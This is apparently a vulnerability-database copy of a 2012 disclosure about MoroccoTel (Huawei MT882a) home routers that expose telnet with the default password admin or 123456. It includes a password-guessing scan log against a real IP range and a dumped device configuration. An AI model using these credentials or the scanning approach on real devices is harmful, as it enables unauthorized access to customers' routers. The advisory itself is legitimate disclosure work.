Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MoroccoTel Default Password

🗓️ 25 Apr 2012 00:00:00Reported by Jerome AthiasType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

MoroccoTel Box Vulnerability with Default Password

Code
`Hi,  
  
a "vulnerability" was identified on MoroccoTel Boxes:  
a telnet server is running, open to the web, with a default password of  
admin (or 123456)  
  
This critical vulnerability can affect the entire network of a Country.  
  
Solution: change the default password account or modify the default firmware  
  
NB: a new firmware was released, introducing a cipher on the "PPOE  
password" (one common, publicly available PPOE account is largely used)  
  
Discovered by NETpeas research team, NETpeas CERT is trying to contact  
the ISP  
  
More details:  
  
Password:  
telnettry  
41.141.*.* -> Response telnet02: ****  
Copyright (c) 2001 - 2006 Huawei  
MT882a>  
***********************************************************  
41.141.*.* -> TELNET PASSWORD FOUND: admin  
  
MT882a> show all  
  
RAS version: V100R001B022 MoroccoTel 2010/02/26  
System ID: $5.0.152.1(RUE0.C2)3.11.2.151 20110602_V001 [Jun 02 2011  
13:54:48]  
romRasSize: 1217226  
system up time: 2:45:45 (f2cc9 ticks)  
bootbase version: VTC_SPI1.5| 2011/05/26  
  
  
Hostname = MT882a  
Message = <empty>  
ip route mode = Yes  
bridge mode = Yes  
DHCP setting:  
DHCP Mode = Server  
Client IP Pool Starting Address = 192.168.1.2  
Size of Client IP Pool = 64  
Primary DNS Server = 8.8.8.8  
Secondary DNS Server = 8.8.4.4  
DHCP server leasetime = 86400  
TCP/IP Setup:  
IP Address = 192.168.1.1  
IP Subnet Mask = 255.255.255.0  
Rip Direction = None  
Version = Rip-1  
Multicast = IGMP-v2  
  
  
RemoteNode = 0  
Rem Node Name = ISP-0(ISP)  
Encapsulation = PPPoE  
Multiplexing = LLC-based  
Channel active = Yes  
VPI/VCI value = 8/35  
IP Routing mode= Yes  
Bridge mode = No  
PPP Username = <snip>  
  
PPP Password  
41.141.*.* -> = *******  
PPP Username_ext2 =  
PPP Password_ext2 =  
Service name =  
Remote IP Addr = 0.0.0.0  
Remote IP Subnet Mask = 0.0.0.0  
IP address assignment type = Dynamic  
SUA = Yes  
Multicast = None  
Default Route node = Yes  
  
RemoteNode = 1  
Rem Node Name = ISP-1  
Encapsulation = RFC 1483  
Multiplexing = LLC-based  
Channel  
41.141.1.9 -> Port 80 open  
41.141.*.* -> active = Yes  
VPI/VCI value = 0/35  
IP Routing mode= No  
Bridge mode = Yes  
Remote IP Addr = 0.0.0.0  
Remote IP Subnet Mask = 0.0.0.0  
  
41.141.*.* -> IP address assignment type = Dynamic  
  
41.141.*.* -> SUA = No  
Multicast = None  
Default Route node = No  
  
RemoteNode = 2  
Rem Node Name = ISP-2  
Encapsulation = RFC 1483  
Multiplexing = LLC-based  
Channel active = Yes  
VPI/VCI value = 0/32  
IP Routing mode= No  
Bridge mode = Yes  
Remote IP Addr = 0.0.0.0  
Remote IP Subnet Mask = 0.0.0.0  
IP address assignment type = Dynamic  
SUA = No  
Multicast = None  
Default Route node = No  
  
RemoteNode = 3  
Rem Node Name = ISP-3  
Encapsulation = RFC 1483  
Multiplexing = LLC-based  
Channel active = Yes  
VPI/VCI value = 8/32  
IP Routing mode= No  
Bridge mode = Yes  
Remote IP Addr = 0.0.0.0  
Remote IP Subnet Mask = 0.0.0.0  
IP address assignment type = Dynamic  
SUA = No  
Multicast = None  
Default Route node = No  
  
RemoteNode = 4  
Rem Node Name = ISP-4  
Encapsulation = RFC 1483  
Multiplexing = LLC-based  
Channel active = Yes  
VPI/VCI value = 8/81  
IP Routing mode= No  
Bridge mode = Yes  
Remote IP  
41.141.*.* -> Addr = 0.0.0.0  
Remote IP Subnet Mask = 0.0.0.0  
IP address assignment type = Dynamic  
SUA = No  
Multicast = None  
Default Route node = No  
  
RemoteNode = 5  
Rem Node Name = ISP-5  
Encapsulation = RFC 1483  
Multiplexing = LLC-based  
Channel active = Yes  
VPI/VCI value = 0/100  
IP Routing mode= No  
Bridge mode = Yes  
Remote IP A  
41.141.*.* -> ddr = 0.0.0.0  
Remote IP Subnet Mask = 0.0.0.0  
IP address assignment type = Dynamic  
SUA = No  
sMulticast = None  
  
41.141.*.* -> yDefault Route node = No  
s  
RemoteNode = 6  
aRem Node Name = ISP-6t  
sEncapsulation = hRFC 1483  
  
Multiplexing = LLC-based  
Channel active = Yes  
VPI/VCI value = 1/39  
IP Routing mode= No  
Bridge mode = Yes  
Remote IP Addr = 0.0.0.0  
Remote IP Subnet Mask = 0.0.0.0  
IP address assignment type = Dynamic  
SUA = No  
Multicast = None  
Default Route node = No  
  
RemoteNode = 7  
Rem Node Name = ISP-7  
Encapsulation = RFC 1483  
Multiplexing = LLC-based  
Channel active = Yes  
VPI/VCI value = 0/16  
IP Routing mode= No  
Bridge mode = Yes  
Remote IP Addr = 0.0.0.0  
Remote IP Subnet Mask = 0.0.0.0  
IP address assignment type = Dynamic  
SUA = No  
Multicast = None  
Default Route node = No  
  
MT882a>  
RAS version : V100R001B022 MoroccoTel  
romRasSize : 1217226  
bootbase version : VTC_SPI1.5| 2011/05/26  
Product Model : SmartAX  
  
MAC Address : <snip-inclear>  
  
Default Count  
41.141.*.* -> ry Code : FF  
  
Boot Module Debug Flag : 00  
  
RomFile Version : 9F  
  
RomFile Checksum : dceb  
  
RAS F/W Checksum : 87b7  
  
SNMP MIB level & OID : 050000000100000002000000030000000400000005  
  
Main Feature Bits : 86  
  
Other Feature Bits :  
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
00 00 00 00 00 00 00 00 00 00 13 00 00 00  
MT882a>  
41.141.*.* -> e  
41.141.*.* -> ther config  
--------------- NDIS CONFIGURATION BLOCK ----------------  
type=1 flags=0001  
Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2  
task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2  
board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0  
board-pp (8042c8f0)  
804273fc  
line-pp (8042c8f4)  
8042956c  
chann-pp (8042c8f8)  
804bf8a4 804bfe34  
--------------- BOARD DISPLAY ---------------------------  
ID slot# n-line n-chann status line-cfg chann-cfg  
00 0 1 2 0001 8042c8bc 8042c8d0  
--------------- LINE DISPLAY ---------------------------  
ID line# board-id n-chann chann-cfg  
00 1 00 2 8042c8d0  
--------------- CHANNEL DISPLAY -------------------------  
ID chan# line-id board-id address name  
00 1 00 00 804bf8a4 enet0  
01 2 00 00 804bfe34 enet1  
MT882a>  
  
  
--   
Jerome Athias - NETpeas  
VP, Director of Software Engineer  
Palo Alto - Paris - Casablanca  
Mobile: +212665346454  
www.netpeas.com  
---------------------------------------------  
Stay updated on Security: www.vulnerabilitydatabase.com  
  
"The computer security is an art form. It's the ultimate martial art."  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Apr 2012 00:00Current
0.7Low risk
Vulners AI Score0.7
moroccotelvulnerabilitytelnetdefault passwordadmin123456firmwareppoeciphernetpeasisphuawei
28